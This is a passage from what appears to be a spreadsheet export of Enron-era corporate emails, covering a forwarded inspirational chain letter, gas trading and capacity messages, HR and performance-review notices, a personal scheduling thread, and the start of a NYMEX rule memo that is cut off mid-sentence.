&gt;  &gt;      Michael  and asked him, "I don't get it!  You can't be a_x000D_
&gt; positive_x000D_
&gt;  &gt; person all of  the time._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      How do you do it?"_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael replied, "Each morning I wake up and say to myself,_x000D_
&gt; you have_x000D_
&gt;  &gt; two choices today._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You can choose to be in a good mood or you can choose to be_x000D_
&gt; in a bad_x000D_
&gt;  &gt; mood. I choose to be in a good mood._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Each time something bad happens, I can choose to be a victim_x000D_
&gt; or I_x000D_
&gt;  &gt; can choose to learn from it. I choose to learn from it._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Every time someone comes to me complaining, I can choose to_x000D_
&gt; accept_x000D_
&gt;  &gt; their complaining or I can point out the positive side of life. I_x000D_
&gt; choose_x000D_
&gt;  &gt; the_x000D_
&gt;  &gt; positive side of life._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Yeah, right, it's not that easy,"  I protested._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Yes, it is,"  Michael said.  "Life is all about choices._x000D_
&gt; When you_x000D_
&gt;  &gt; cut away all the junk, every situation is a choice._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You choose how you react to situations._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You choose how people affect your mood.  You choose to be in_x000D_
&gt; a good_x000D_
&gt;  &gt; mood  or bad mood. The bottom line:  It's your choice how you live_x000D_
&gt; life."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      I reflected on what Michael said.  Soon thereafter, I left_x000D_
&gt; the Towe_x000D_
&gt;  &gt;      Industry to start my own business.  We lost touch, but I_x000D_
&gt; often_x000D_
&gt;  &gt; thought about him when I made a choice about life instead of_x000D_
&gt; reacting to_x000D_
&gt;  &gt; it._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Several years later, I heard that Michael was involved in a_x000D_
&gt; serious_x000D_
&gt;  &gt;      accident, falling some 60 feet from a communications tower._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      After 18 hours of surgery and weeks of intensive care,_x000D_
&gt; Michael was_x000D_
&gt;  &gt;      released  from the hospital with rods placed in his back._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      I saw Michael about six months after the accident. When I_x000D_
&gt; asked him_x000D_
&gt;  &gt; how  he  was, he replied.  "If I were any better, I'd be twins._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Wanna see my scars?"  I declined to see his wounds, but did_x000D_
&gt; ask him_x000D_
&gt;  &gt; what had gone through his mind as the accident took place._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "The first thing that went through my mind was the well-being_x000D_
&gt; of my_x000D_
&gt;  &gt;      soon to be born daughter, "  Michael replied.  "Then, as I_x000D_
&gt; lay on_x000D_
&gt;  &gt; the_x000D_
&gt;  &gt;      ground, I remembered that I had two choices:  I could choose_x000D_
&gt; to live_x000D_
&gt;  &gt; or   I could choose to die.  I chose to live."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Weren't you scared?  Did you lose consciousness?" I asked._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael continued, "...the paramedics were great. They kept_x000D_
&gt; telling_x000D_
&gt;  &gt; me I  was going to be fine.  But when they wheeled me  into the ER_x000D_
&gt; and I_x000D_
&gt;  &gt; saw_x000D_
&gt;  &gt; the expressions on the faces of the doctors and  nurses, I got_x000D_
&gt; really_x000D_
&gt;  &gt; scared..   In their eyes, I read 'he's a dead man."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      I knew I needed to take action."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "What did you do?"  I asked._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Well there was a big burly nurse shouting questions at me,"_x000D_
&gt; said_x000D_
&gt;  &gt;      Michael.  "She asked if I was allergic to anything.  "Yes, I_x000D_
&gt;  &gt; replied."_x000D_
&gt;  &gt;      The doctors and nurses stopped working as they waited for my_x000D_
&gt; reply._x000D_
&gt;  &gt; I  took a deep breath and yelled, "Gravity."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Over their laughter, I told them, "I am choosing to live._x000D_
&gt; Operate on_x000D_
&gt;  &gt; me as if I am alive, not dead."_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Michael lived, thanks to the skill of his doctors, but also_x000D_
&gt; because_x000D_
&gt;  &gt; of  his amazing attitude.  I learned from him that every day we_x000D_
&gt; have the_x000D_
&gt;  &gt; choice to live fully._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Attitude, after all, is everything._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      "Therefore do not worry about tomorrow, for tomorrow will_x000D_
&gt; worry_x000D_
&gt;  &gt; about itself._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      Each day has enough trouble of its own."_x000D_
&gt;  &gt;      Matthew 6:34_x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      After all today is the tomorrow you worried about yesterday._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;      You have two choices now:_x000D_
&gt;  &gt;        1.  Delete this._x000D_
&gt;  &gt;        2.  Forward it to the people you care about._x000D_
&gt;  &gt;_x000D_
&gt;  &gt;         I hope you will choose #2.  I did_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 02:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.kiani@enron.com'})</t>
  </si>
  <si>
    <t>Gas Pricing Update</t>
  </si>
  <si>
    <t xml:space="preserve">Charlie,_x000D_
_x000D_
Can you please update the gas price for the National Fuel deal in New York?  _x000D_
Our customer called and would like updated deal economics from us.  This was _x000D_
the one that was NYMEX + INDEX (I think that BASIS was 0), and was on the USA _x000D_
side of the border.  I believe that we dinged the price approx. 5 to 6 cents _x000D_
for that.  In any case, I have attached the form with the relevant _x000D_
information.  Please let me know if you have any questions or need more _x000D_
information._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 08:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Judge Meyer</t>
  </si>
  <si>
    <t xml:space="preserve">Here it is:_x000D_
_x000D_
I have some dope on the judge as well.  He was a very small time lawyer out_x000D_
in La Mesa (the sticks) with a general practice that  included litigation._x000D_
He was a family law judge until he was made an overflow general civil judge_x000D_
in 1998.  None of the lawyers whom I have listed would be likely to have a_x000D_
relationship with him from their days in practice.  Also, he may not keep_x000D_
the case, given its high profile, and the fact that it is related to the_x000D_
case filed against the generators, which has a lower number.  People who_x000D_
know Judge Meyer say he is pompous and not very bright._x000D_
_x000D_
He practiced with three lawyers. One of them went on the bench and is now_x000D_
retired.  Another has also retired.  The remaining one is LeRoy Knutson, who_x000D_
is of counsel in a small firm in El Cajon, also the sticks._x000D_
_x000D_
Thanks_x000D_
Gary_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=======================================================_x000D_
This email message is for the sole use of the intended recipient(s) and may _x000D_
contain confidential and privileged information. Any unauthorized review, _x000D_
use, disclosure or distribution is prohibited. If you are not the intended _x000D_
recipient, please contact the sender by reply email and destroy all copies of _x000D_
the original message._x000D_
_x000D_
To reply to our email administrator directly, send an email to _x000D_
postmaster@brobeck.com_x000D_
BROBECK PHLEGER &amp; HARRISON LLP_x000D_
http://www.brobeck.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2000 02:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kate.fraser@enron.com', 'dan.junek@enron.com', 'chris.germany@enron.com', 'robin.barbe@enron.com'})</t>
  </si>
  <si>
    <t>Capacity Offer</t>
  </si>
  <si>
    <t xml:space="preserve">Can we talk about what we want to pay for this capacity?  PSEG has released _x000D_
at $0.16 and $0.15.  Con Ed has released at $0.14.  Do we want to pay those _x000D_
prices?  Con Ed will do prearranged non-biddable with us at $0.15 (maybe _x000D_
$0.14)._x000D_
_x000D_
Thanks,_x000D_
Maureen_x000D_
---------------------- Forwarded by Maureen Smith/HOU/ECT on 03/15/2000 09:58 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"ANNE FILAS" &lt;afilas@keyspanenergy.com&gt; on 03/15/2000 08:30:13 AM_x000D_
To: Jackie Crowley &lt;jcrowley@sempratrading.com&gt;, Terry Kain _x000D_
&lt;tkain@worldnet.att.net&gt;, Cary Bender &lt;cbender22@aol.com&gt;, Susan Filgaras _x000D_
&lt;ceine@aol.com&gt;, clombardi &lt;clombardi@advanix.net&gt;, cruikshankk _x000D_
&lt;cruikshankk@conedsolutions.com&gt;, energon &lt;energon@aol.com&gt;, intenergy _x000D_
&lt;intenergy@aol.com&gt;, "james.breslin" &lt;james.breslin@pseg.com&gt;, jbutkus _x000D_
&lt;jbutkus@utilicorp.com&gt;, jgarofalow &lt;jgarofalow@castlepower.com&gt;, jupdale _x000D_
&lt;jlupdale@metromediaenergy.com&gt;, jneubauer &lt;jneubauer@naenergy.com&gt;, kmgorden _x000D_
&lt;kmgorden@duke-energy.com&gt;, Columbia Energy &lt;KNovsek@columbiaenergy.com&gt;, _x000D_
lsmorris &lt;lsmorris@metromediaenergy.com&gt;, "marci.mansfield" _x000D_
&lt;marci.mansfield@pgees.com&gt;, mcasas &lt;mcasas@statoilenergy.com&gt;, metroenergy _x000D_
&lt;metroenergy@worldnet.att.net&gt;, mnaeser &lt;mnaeser@naenergy.com&gt;, pbaratz _x000D_
&lt;pbaratz@totalnrg.com&gt;, quartiersm &lt;quartiersm@nmenergy.com&gt;, rdauria _x000D_
&lt;rdauria@reliantenergy.com&gt;, rperez &lt;rperez@allenergy.com&gt;, saulh _x000D_
&lt;saulh@econnergy.com&gt;, sjfuel &lt;sjfuel@mindspring.com&gt;, supply _x000D_
&lt;supply@castlepower.com&gt;, tcampo &lt;tcampo@njne.com&gt;, "tracy.wood" _x000D_
&lt;tracy.wood@pgees.com&gt;, Dave Mueller &lt;dmueller@sempratrading.com&gt;, Maureen _x000D_
Smith &lt;maureen.smith@enron.com&gt;, Paul Garner &lt;pegarner@duke-energy.com&gt;, Mark _x000D_
Otterstedt &lt;MAOtters@utilicorp.com&gt;, Rob Gennarini _x000D_
&lt;Rob.Gennarini@Conectiv.com&gt;, Mark Gizzilli &lt;MarkG@Cook-Inlet.com&gt;, Chad _x000D_
Wagner &lt;CJWA@Dynegy.com&gt;, Kristy Litner &lt;KMLI@Dynegy.com&gt;, Jean Ford _x000D_
&lt;JFoard@Coral-energy.com&gt;, Carolyn Gilbert &lt;CKROG98@aol.com&gt;, James Toczyl _x000D_
&lt;JTOZZ@aol.com&gt;, Tony Muscarello &lt;Tony.Muscarello@CESOURCE.com&gt;, Sandy Rangel _x000D_
&lt;SandyRengel@engageenergy.com&gt;, David Silbert &lt;SILBER2D@KochiND.com&gt;, Gerry _x000D_
Barth &lt;GBBarth@NJNG.com&gt;, James Burgess &lt;JBurgess@Noblegas.com&gt;, Eileen _x000D_
Sweeney &lt;NAU87@aol.com&gt;, Christine Frezza &lt;CFrezza@NUI.com&gt;, Karen Holub _x000D_
&lt;Kholub@PCEnergy.com&gt;, Tracey Barnett &lt;Tracey-Barnett@PerryGas.com&gt;, Chris _x000D_
Bosco &lt;CSB@ptrcom.com&gt;, Bryan Frey &lt;Bryan.Frey@gen.pge.com&gt;, Terry Crupi _x000D_
&lt;Tjcrupi@papl.com&gt;, Vincent Tennariello &lt;Vincent.tennariello@pseg.com&gt;, Carl _x000D_
Nunziato &lt;Carlnunziato@southernenergy.com&gt;, Criss Johnson _x000D_
&lt;Johns00@texaco.com&gt;, Bill McCartney &lt;Mccarwh@texaco.com&gt;, Darren Angerman _x000D_
&lt;Darren_Angerman@transcanada.com&gt;, Duane Blackowell _x000D_
&lt;Duane_Blackowell@vapower.com&gt;, Mike Jessup &lt;Michael_Jessup@vapower.com&gt;, _x000D_
Sharon Baker &lt;Sharonbaker@williams.com&gt;, Julia Schiavi &lt;jschiavi@hess.com&gt;, _x000D_
Linda Verona &lt;lverona@hess.com&gt;_x000D_
cc:  _x000D_
Subject: Capacity Offer_x000D_
_x000D_
_x000D_
Attached is a capacity offer being made by Brooklyn Union of New York_x000D_
(formerly Brooklyn Union)._x000D_
_x000D_
If you experience any difficulty opening the attached file, or have any_x000D_
questions pertaining to the offer, please call me at (718) 403-2981._x000D_
_x000D_
All bids must be faxed to  (718) 643-6306 no later than the specified_x000D_
date on the attachment._x000D_
_x000D_
 - Offer_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 04:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Great.  I'm gone.  I'll have my cell phone on later._x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 08/02/2000 11:33 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re:  _x000D_
_x000D_
Ok, I'll mark you out then._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/02/2000 11:17 AM_x000D_
		_x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Let's just assume I'll be out Friday afternoon._x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 08/02/2000 11:16 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re:  _x000D_
_x000D_
I'm sure he gets that from you.  He'll be fine, just get him the help that he _x000D_
needs.  Let me know about Friday when you decide.  _x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/02/2000 11:13 AM_x000D_
		_x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
I suspect that there are several options._x000D_
_x000D_
He is such a sweet, cute, smart thing.  You will like him. He is very very _x000D_
charming._x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 08/02/2000 11:12 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re:  _x000D_
_x000D_
He can be helped though right?  Block out Friday afternoon?_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/02/2000 10:58 AM_x000D_
		_x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
We've known, but is has gotten to be a bigger issue as he has gotten older._x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 08/02/2000 10:53 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re:  _x000D_
_x000D_
Are you just finding out?  I know there are things that can be done to help _x000D_
that situation.  Do you want me to block you out for Friday afternoon as _x000D_
well.  You need to get this taken care of quickly for Michael's sake.  _x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/02/2000 10:40 AM_x000D_
		_x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Michael problems. He has ADD and some other lesser learning problems.  We are _x000D_
going to meet  with the specialist next week._x000D_
_x000D_
I'm going to try to take off Friday afternoon as well.  We are thinking of _x000D_
changing his school, and Neil and I need to go visit a new one._x000D_
_x000D_
HECTIC!_x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 08/02/2000 09:59 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re:   _x000D_
_x000D_
Are you ok?_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/01/2000 06:03 PM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
Please protect Thursday afternoon, August 10th for me.  I have some important _x000D_
personal stuff to take care of._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 3 Apr 2000 08:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Product</t>
  </si>
  <si>
    <t>Dale,_x000D_
_x000D_
The Texas Desk needs to get a new product created.  We already have a _x000D_
baseload Index Corpus product.  We need to create a DAY Corpus product with _x000D_
the same parameters as this baseload product._x000D_
_x000D_
_x000D_
Also, anything new on the 5 X 24?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 08:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">It took a lot of effort from ENA Legal (Lisa Mellencamp, Gerald Nemec &amp; some _x000D_
help from me), the Transport Desk (Stephanie Miller), the West Desk (Barry _x000D_
Tycholiz) and Credit (Bill Bradford and Wendy Conwell), to finalize this very _x000D_
funky credit substitution transaction with PG&amp;E Trading (to cover over _x000D_
$200million in margin exposure--Thank God it is now finally done.  _x000D_
_x000D_
If anyone catches wind of a PG&amp;E Energy Trading bankruptcy, please advise _x000D_
ASAP so that we can act quickly to exercise our valuation and exercise rights._x000D_
_x000D_
Thanks_x000D_
_x000D_
Steve Van Hooser_x000D_
Enron North America Corp._x000D_
1400 Smith_x000D_
EB3877_x000D_
Houston, Texas  77002_x000D_
713-853-7238_x000D_
----- Forwarded by Steve Van Hooser/HOU/ECT on 04/23/2001 03:48 PM -----_x000D_
_x000D_
	Stephanie Miller@ENRON_x000D_
	04/23/2001 03:31 PM_x000D_
		_x000D_
		 To: Gerald Nemec/HOU/ECT@ECT_x000D_
		 cc: Lisa Mellencamp/HOU/ECT@ECT, Steve Van Hooser/HOU/ECT@ECT, William S _x000D_
Bradford/Enron@EnronXGate@ECT, Barry Tycholiz/NA/Enron@ENRON_x000D_
		 Subject: Re: AGREEMENT WITH RESPECT TO GAS TRANSPORTATION_x000D_
_x000D_
ENA has successfully acquired the PG&amp;E capacity through EPNG's capacity _x000D_
release process. I will forward copies of the awards to legal._x000D_
_x000D_
Please call if you have any questions._x000D_
_x000D_
Regards,_x000D_
_x000D_
Stephanie _x000D_
x31688_x000D_
_x000D_
_x000D_
_x000D_
Gerald Nemec@ECT_x000D_
04/23/2001 02:06 PM_x000D_
To: Lisa Mellencamp/HOU/ECT@ECT, Steve Van Hooser/HOU/ECT@ECT, William  S _x000D_
Bradford/Enron@EnronXGate, Barry Tycholiz/NA/Enron@ENRON, Stephanie _x000D_
Miller/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: AGREEMENT WITH RESPECT TO GAS TRANSPORTATION_x000D_
_x000D_
For the sake of completeness attached is the final version of the Gas _x000D_
Transaction Support Agreement. _x000D_
_x000D_
_x000D_
----- Forwarded by Gerald Nemec/HOU/ECT on 04/23/2001 01:42 PM -----_x000D_
_x000D_
	"Meier, Peter" &lt;peter.meier@neg.pge.com&gt;_x000D_
	04/23/2001 01:23 PM_x000D_
		 _x000D_
		 To: "'gerald.nemec@enron.com'" &lt;gerald.nemec@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: AGREEMENT WITH RESPECT TO GAS TRANSPORTATION_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PG&amp;E National Energy Group and any other_x000D_
company referenced herein that uses the PG&amp;E name or_x000D_
logo are not the same company as Pacific Gas and_x000D_
Electric Company, the regulated California utility.  Neither_x000D_
PG&amp;E National Energy Group nor these other_x000D_
referenced companies are regulated by the California Public_x000D_
Utilities Commission.  Customers of Pacific Gas and Electric Company_x000D_
do not have to buy products from these companies in order_x000D_
to continue to receive quality regulated services from the utility._x000D_
 - Gas Transaction Agr. Execution (4-23-01).doc_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Apr 2002 14:48:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>Movie times at the weslyan</t>
  </si>
  <si>
    <t xml:space="preserve">Scorpion King, The &lt;/shop?d=hv&amp;cf=info&amp;id=1805535170&gt; PG-13 1 hr. 29 min._x000D_
(12:30 PM), (1:00), (1:30), (2:50), (3:15), (3:40), (5:00), 5:30, 5:50, 7:15, 7:45, 8:10, 9:30, 10:00, 10:20 </t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 02:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maria.houten@enron.com', 'kate.symes@enron.com', 'lei.chen@enron.com', 'david.porter@enron.com', 'holden.salisbury@enron.com', 'tim.heizenrader@enron.com', 'mark.fischer@enron.com', 'chris.mallory@enron.com', 'jesse.bryson@enron.com', 'lisa.gang@enron.com', 'jim.reyes@enron.com', 'samantha.law@enron.com', 'stacy.runswick@enron.com', 'robert.badeer@enron.com', 'steven.merris@enron.com', 'amy.fitzpatrick@enron.com', 'heather.dunton@enron.com', 'monika.causholli@enron.com', 'kit.blair@enron.com', 'david.poston@enron.com', 'stephen.swain@enron.com', 'leaf.harasin@enron.com', 'donald.robinson@enron.com', 'chris.stokley@enron.com', 'paul.kane@enron.com', 'caroline.emmert@enron.com', 'jeff.richter@enron.com', 'debra.davidson@enron.com', 'kathy.axford@enron.com', 'michael.driscoll@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'julie.sarnowski@enron.com', 'robert.anderson@enron.com', 'bill.iii@enron.com', 'mike.purcell@enron.com', 'fran.chang@enron.com', 'eric.linder@enron.com', 'cara.semperger@enron.com', 'donna.johnson@enron.com', 'geir.solberg@enron.com', "murray.o'neil@enron.com", 'phillip.platter@enron.com', 'diana.scholtes@enron.com', 'diane.cutsforth@enron.com', 'matt.motley@enron.com', 'mark.guzman@enron.com', 'sean.crandall@enron.com', 'richard.schweiger@enron.com', 'jeremy.morris@enron.com', 'scotty.gilbert@enron.com', 'craig.dean@enron.com'})</t>
  </si>
  <si>
    <t>TIMEKEEPING REMINDER</t>
  </si>
  <si>
    <t>Fri, 7 Jan 2000 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Would you please give me a call to discuss the legal opinion.  After 10 am _x000D_
Houston time is fine.  Happy New Year.  SS</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:58:29 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'s..landry@enron.com'})</t>
  </si>
  <si>
    <t>Out of Office AutoReply: BP Capital Energy Equity International_x000D_
 Holdings 1, L.P.</t>
  </si>
  <si>
    <t>I will be out of the office from November 19 - November 28.  You may call Woodrow Collett at X58826 if you have any questions.  I will also be checking voicemail during this time.</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 14:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'herring_family@hotmail.com', 'bdouglas@jps.net', 'hank.salvo@robertmondavi.com', 'scottwl@hotmail.com', 'gonarvco@aol.com', 'chezshea94116@earthlink.net', 'devans@napanet.net', 'mickey.lombardi@robertmondavi.com', 'rtaylor@verisign.com', 'nancy.sellers@mondavi.com', 'barrie2@aol.com', 'smccarthy@baseconsulting.com', 'psellers@pacbell.net', 'andybaum@pop.sonic.net', 'eldonsellers@hotmail.com', 'psellers@haas.berkeley.edu', 'kennyd@hdcdojnet.state.ca.us', 'patrick.delong@robertmondavi.com', 'ddusnick@usa.net', 'cameron@perfect.com', 'cindy.nagy@robertmondavi.com', 'greg.brady@robertmondavi.com', 'jamkartozian@jps.net', 'mikeh@thirdage.com', 'cchezshea@aol.com', 'skmaloney@yahoo.com', 'barrie.eddy@robertmondavi.com', 'lynne_kenny@csaa.com', 'carlton@granicus.com', 'jdasovic@enron.com', 'giantvine@juno.com', 'camsell@pacbell.net', 'ken_webster@e-stockoptions.com', 'cshea@marin.org', 'bgrowney@gunder.com', 'eldon@interx.net', 'cshea@brobeck.com', 'amozes@covad.com', 'cplatkin@hotmail.com'})</t>
  </si>
  <si>
    <t>Week 12 Final - WEEK 13 GAMES START ON THURSDAY!!</t>
  </si>
  <si>
    <t>Congratulations to Dave, Mickey, Mike &amp; Lisa (second week in a row for them)_x000D_
and Pat for coming in 1st, 2nd, 3rd and 4th respectively.  Cameron is still_x000D_
holding onto first place by a slim margin over Brady.  There are only twelve_x000D_
points separating fourth and tenth place.  Another close race is for last_x000D_
place (sorry there's no prize for this) and Prentice and Daryl seem to be_x000D_
fighting to avoid this distinction._x000D_
_x000D_
_x000D_
_x000D_
 - 2000WK12final.xls_x000D_
 - Pick Sheet - Week 13.xls</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 05:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">This should be Amerex - Diana is changing it now._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
03/12/2001 02:04 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb checkout_x000D_
_x000D_
547298, broker is not showing_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 04:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'prc_pep.mailout@enron.com'})</t>
  </si>
  <si>
    <t>Year End 2000 PRC/PEP Training</t>
  </si>
  <si>
    <t>For employees who have not been through the PRC/PEP process before, please be _x000D_
advised that there will be PRC/ PEP training available.  Please attend one of _x000D_
the training sessions below: _x000D_
_x000D_
PRC/PEP Employee &amp; Supervisor Training_x000D_
_x000D_
Date: October 30,2000_x000D_
Place: Hyatt, Aboretum_x000D_
Session I: 9:00- 11:00 a.m._x000D_
Session II: 2:00- 4:00 p.m._x000D_
_x000D_
Date: October 31,2000_x000D_
Place: EB49C3_x000D_
Session I: 9:00- 11:00 a.m._x000D_
Session II: 2:00- 4:00 p.m._x000D_
_x000D_
In the next few days, all employees will receive PRC/PEP training material in _x000D_
the mail.  If you have utilized the PEP system before, then attendance for _x000D_
the training sessions are optional.  The new intranet interface should make _x000D_
the PEP system more user friendly and faster.  _x000D_
_x000D_
Please contact Jennifer Jordan at ext: 3-7554, if you have any questions _x000D_
concerning training materials or classes</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 06:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bmcmills@duke-energy.com'})</t>
  </si>
  <si>
    <t>Discrepancies in Price of Gas redelivered at Mobil Beaumont</t>
  </si>
  <si>
    <t xml:space="preserve">I thought it might be easier to reply by email of the_x000D_
period, volume, and price for periods when the_x000D_
price for gas redelivered by Duke at Mobil Beaumont was not_x000D_
HSC Monthly Index - $.0375._x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 08:00:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'s..lim@enron.com'})</t>
  </si>
  <si>
    <t>exp dates</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I'm not sure if this is what you are looking for._x000D_
Can you check. This is all that we have in the system</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 17:15:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jderric@enron.com', 'derrick.jr.@enron.com'})</t>
  </si>
  <si>
    <t>DERRICK JR., JAMES V,_x000D_
 _x000D_
You have been selected to participate in the Mid Year 2001 Performance Management process.  Your feedback plays an important role in the process, and your participation is critical to the success of Enron's Performance Management goals._x000D_
 _x000D_
To complete a request for feedback, access PEP at http://pep.enron.com and select Complete Feedback from the Main Menu.  You may begin providing feedback immediately and are requested to have all feedback forms completed by Friday, May 25, 2001. _x000D_
 _x000D_
If you have any questions regarding PEP or your responsibility in the process, please contact the PEP Help Desk at:_x000D_
Houston:  1.713.853.4777, Option 4 or email: perfmgmt@enron.com_x000D_
London:  44.207.783.4040, Option 4 or email: pep.enquiries@enron.com _x000D_
 _x000D_
Thank you for your participation in this important process. _x000D_
 _x000D_
The following is a CUMULATIVE list of employee feedback requests with a status of "OPEN."  Once you have submitted or declined an employee's request for feedback, their name will no longer appear on this list.  NOTE: YOU WILL RECEIVE THIS MESSAGE EACH TIME YOU ARE SELECTED AS A REVIEWER. _x000D_
 _x000D_
Employee Name:_x000D_
CARTER, REBECCA_x000D_
LABANOWSKI, _x000D_
SHARP, VICTORIA</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 00:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>(01-154) Implementation of New NYMEX Rule 9.11A (Give-Up Trades)_x000D_
 IMPORTANT MEMO</t>
  </si>
  <si>
    <t>Notice # 01-154_x000D_
May 7, 2001_x000D_
_x000D_
TO:_x000D_
All NYMEX Division Members and Member Firms_x000D_
_x000D_
FROM:_x000D_
Neal L. Wolkoff, Executive Vice President_x000D_
_x000D_
RE:_x000D_
Implementation of New NYMEX Rule 9.11A ("Give-Up Trades")_x000D_
_x000D_
DATE:_x000D_
May 7, 2001_x000D_
===========================================================_x000D_
Please be advised that beginning on the trade date of Friday, June 1, 2001,_x000D_
new NYMEX Rule 9.11A ("Give-Up Trades") will go into effect._x000D_
_x000D_
!    In the absence of an applicable give-up agreement, new Rule 9.11A will_x000D_
define the respective responsibilities/obligations to an order of executing_x000D_
brokers, customers and Clearing Members._x000D_
_x000D_
!    The term "executing broker" as used in Rule 9.11A refers to the_x000D_
